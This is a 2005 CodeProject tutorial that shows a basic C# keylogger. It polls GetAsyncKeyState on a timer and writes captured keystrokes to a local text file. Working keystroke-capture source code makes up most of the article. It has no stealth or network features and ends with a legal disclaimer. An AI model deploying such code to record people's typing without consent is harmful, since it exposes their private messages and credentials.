Click here to Skip to main content
65,938 articles
CodeProject is changing. Read more.
Articles
 
(untagged)

Basic Keystroke Mining

0.00/5 (No votes)
12 May 2005 1  
A simple key logging implementation using Visual C# .NET.

Introduction

A key logger, or keystroke logger, is a piece of hardware or software which records user keystrokes such as instant messages, e-mail, and any information you type at any time using your keyboard. Many key log solutions are very careful to be invisible to computer users and are often used by employers to ensure employees use work computers for business purposes only.

This article illustrates a simple key logging scheme built around GetAsyncKeyState as the key logging core.

Simple Keystroke Mining Life Cycle

Sample image

  1. A key logger typically records actions and events on a computer to a volatile buffer.
  2. Once the buffer is full, or on set intervals, the buffer is flushed to a non-volatile �log file�.
  3. A common practice among key log solutions is to encrypt the �log file�.

Code Snippets

The KeyLogger class:

public class Keylogger
{
    // The GetAsyncKeyState function determines

    // whether a key is up or down at the time 

    // the function is called, and whether

    // the key was pressed after a previous call 

    // to GetAsyncKeyState.

    // "vKey" Specifies one of 256 possible virtual-key codes. 

    // If the function succeeds, the return value specifies whether the key 

    // was pressed since the last call

    // to GetAsyncKeyState, and whether the key is 

    // currently up or down.

    // If the most significant bit is set, the key is down, 

    // and if the least significant bit is set, the key was pressed after 

    // the previous call to GetAsyncKeyState. 


    [DllImport("User32.dll")]
    private static extern short GetAsyncKeyState(
        System.Windows.Forms.Keys vKey); // Keys enumeration


    [DllImport("User32.dll")]
    private static extern short GetAsyncKeyState(
        System.Int32 vKey);

        
    private System.String keyBuffer;
    private System.Timers.Timer timerKeyMine;
    private System.Timers.Timer timerBufferFlush;

    // Events & Methods (see excerpts below)

            
    // Properties (see source code)

}

At the heart of the KeyLogger class is the timerKeyMine_Elapsed event which iterates through the entire System.Windows.Forms.Keys enumeration for pressed keys. Downed keys are then stored in the keyBuffer (space delimited).

private void timerKeyMine_Elapsed(object sender, 
                        System.Timers.ElapsedEventArgs e)
{
    foreach(System.Int32 i in Enum.GetValues(typeof(Keys)))
    {
        if(GetAsyncKeyState(i) == -32767)
        {
            keyBuffer += Enum.GetName(typeof(Keys), i) + " ";
        }
    }
}

The timerBufferFlush_Elapsed event transfers key stroke data from the temporary buffer storage to permanent memory.

private void timerBufferFlush_Elapsed(object sender, 
                             System.Timers.ElapsedEventArgs e)
{
    // Preprocessor Directives

    #if (DEBUG)
        MessageBox.Show(keyBuffer); // debugging help

    #else
        Flush2File(@"c:\keydump.txt", true);
    #endif
}
    
public void Flush2File(string file, bool append)
{
    try
    {
        StreamWriter sw = new StreamWriter(file, append);

        sw.Write(keyBuffer);

        sw.Close();

        keyBuffer = ""; // reset

    }
    catch
    {    // rethrow the exception currently handled by 

        // a parameterless catch clause

        throw;
    }
}

KeyLogger usage examples:

static void Main(string[] args)
{
    Keylogger kl = new Keylogger();


    kl.Enabled = true; // enable key logging



    kl.FlushInterval = 60000; // set buffer flush interval



    kl.Flush2File(@"a:\logfile.txt", true); // force buffer flush

}

Log File sample output:

LButton H E L L O Space W O R L D Space OemMinus Space R E L E A S E Space B U I L D

Disclaimer

I strongly discourage anyone from monitoring any computer that you do not own or do not have intellectual property rights over. It is illegal and punishable as a crime under (state law) to intercept electronic communications.

Summary

This article is intended to be used in good faith. The key logging mechanics illustrated are not stealth, and vastly inefficient. There are better, commercially available keyboard hooks and stealthy key loggers available. For the purpose of simplicity, I omitted the encryption of the log file. Nevertheless, in the days of adware, spyware, and growing privacy concerns, I find this to be an interesting venture. Any bugs or suggestions can be tracked below in the message board section. Thanks!

History

  • 05/12/05: Original submission.

License

This article has no explicit license attached to it but may contain usage terms in the article text or the download files themselves. If in doubt please contact the author via the discussion board below.

A list of licenses authors might use can be found here



Permalink

Privacy
Cookies
Terms of Use
Layout: fixed | fluid

Article Copyright 2005 by Alexander Kent
Everything else Copyright © CodeProject, 1999-2024

Web01 2.8:2024-10-20:1